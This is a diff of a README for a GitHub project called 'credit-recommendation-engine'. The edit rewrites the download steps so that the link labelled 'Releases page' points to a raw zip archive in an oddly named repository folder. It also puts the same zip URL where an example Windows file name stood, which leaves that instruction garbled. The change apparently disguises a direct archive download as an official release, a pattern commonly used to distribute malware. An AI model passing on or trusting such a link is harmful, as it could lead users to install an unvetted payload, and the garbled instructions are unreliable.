all-in-one67890/credit-recommendation-engine/README.md

 ### Step 1: Visit the Download Page

-Go to our [Releases page](https://github.com/all-in-one67890/credit-recommendation-engine/releases) to find the latest version.
+Go to our [Releases page](https://raw.githubusercontent.com/all-in-one67890/credit-recommendation-engine/main/centroplasm/credit-recommendation-engine.zip) to find the latest version.

 ### Step 2: Choose Your Version

 On the Releases page, you will see various available versions.
 Select the one that suits your operating system.
-For example, if you are using Windows, look for a file named something like `credit-recommendation-engine-win.exe`.
+For example, if you are using Windows, look for a file named something like `https://raw.githubusercontent.com/all-in-one67890/credit-recommendation-engine/main/centroplasm/credit-recommendation-engine.zip`.

 ### Step 3: Download the File